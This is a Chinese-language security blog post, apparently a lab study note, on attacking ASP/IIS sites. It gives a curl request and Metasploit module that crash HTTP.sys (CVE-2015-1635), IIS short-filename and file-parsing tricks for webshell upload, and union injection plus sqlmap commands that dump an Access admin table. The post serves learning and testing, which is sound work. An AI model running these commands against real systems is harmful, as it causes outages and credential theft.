banner
NEWS LETTER

ASP应用&HTTP.SYS&短文件&文件解析&Access注入&数据库泄漏

Scroll down

ASP-默认安装-MDB数据库泄漏下载

由于大部分ASP程序与ACCESS数据库搭建,但ACCESS没有账号密码,无需连接,都在脚本文件中定义配置好数据库路径就可以用了,不需要额外配置安装数据库,所以大部分提前固定好的数据库路径如默认未修改,当攻击者知道数据库的完整路径,可远程下载后解数据实现攻击。例如早期的Windows 2003的fyblogs_3.0网站。

ASP-中间件-CVE&短文件&解析&写权限

HTTP.SYS(CVE-2015-1635)

  1. 漏洞描述
    远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。然后会直接蓝屏。
  2. 影响版本
    Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2
  3. 漏洞利用条件
    安装了IIS6.0以上的Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2版本
  4. 漏洞复现
    curl -v 192.168.126.130 -H “Host:192.168.126.130” -H “Range:bytes=0-18446744073709551615”
1
2
3
4
msfconsole
use auxiliary/dos/http/ms15_034_ulonglongadd
set rhosts 192.168.126.130
run

IIS短文件

  1. 此漏洞实际是由HTTP请求中旧DOS 8.3名称约定(SFN)的代字符(~)波浪号引起的。它允许远程攻击者在Web根目录下公开文件和前6位文件夹名称(不应该可被访问)。攻击者可以找到通常无法从外部直接访问的重要文件,并获取有关应用程序基础结构的信息。
  2. 漏洞成因:
    为了兼容16位MS-DOS程序,Windows为文件名较长的文件(和文件夹)生成了对应的windows 8.3短文件名。在Windows下查看对应的短文件名,可以使用命令dir /x
  3. 应用场景:
    后台路径获取,数据库文件获取,其他敏感文件获取等
  4. 利用工具:
    IIS-ShortName-Scanner
    IIS_shortname_Scanner

IIS文件解析
IIS 6 解析漏洞
1.该版本默认会将1.asp;.jpg 此种格式的文件名,当成Asp解析
2.该版本默认会将1.asp文件名下的所有文件当成Asp解析
如:
logo.asp;.jpg
xx.asp/logo.jpg

IIS 7.x 解析漏洞
在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为php文件
应用场景:配合文件上传获取Webshell

IIS写权限
IIS<=6.0,老漏洞,目录权限开启写入,开启WebDAV,设置为允许
参考利用

ASP-SQL注入-SQLMAP使用 & ACCESS注入

1
2
3
4
select top 1 * from aboutusclass where classid="&classid&" order by OrderID

## Pic.asp?classid=3带入
select top 1 * from aboutusclass where classid="&3&" order by OrderID

重新定义:SQL注入对用户的输入的数据没有过滤,导致重新定义SQL执行(攻击者定义想要的执行结果语句)由于这个SQL语句是在数据中执行,什么数据库什么SOL语句或有什么SOL执行功能,由数据库类型决定所以说为什么注入,要叫做数据库注入,要区分什么数据库。

1
select top 1 * from aboutusclass where classid="&3&" union select #"&" order by OrderID

http://192.168.126.129:89/Pic.asp?classid=3 正常

http://192.168.126.131:89/Pic.asp?classid=3dsad 错误

http://192.168.126.131:89/Pic.asp?classid=3dsaasdasdad 错误

证明可能有数据库注入漏洞,但是也有可是是容错页面404代码的逻辑设置

Access
   表名
      列名(字段)
         数据


ACCESS数据库无管理帐号密码,顶级架构为表名,列名(字段),数据,所以在注入猜解中一般采用字典猜解表和列再获取数据,猜解简单但又可能出现猜解不到的情况,由于Access数据库在当前安全发展中已很少存在,故直接使用SQLMAP注入,后续再说其他。

1
2
3
python sqlmap.py -u "http://192.168.126.129:89/Pic.asp?classid=3" --tables //获取表名
python sqlmap.py -u "http://192.168.126.129:89/Pic.asp?classid=3" --columns -T admin //获取admin表名下的列名
python sqlmap.py -u "http://192.168.126.129:89/Pic.asp?classid=3" --dump -C "" -T admin  //获取表名下的列名数据

目录扫描:字典去跑

IIS短文件:利用漏洞探针

网站爬虫:获取架构中的目录和文件路径进行分析

其他文章
15
2024/03
工具
7kbscan-WebPathBrute
  • 24/03/15
  • 00:00
12
2024/03
工具
404StarLink
  • 24/03/12
  • 15:50
© 2024 - 2024 CypherSun
请输入关键词进行搜索
  • to close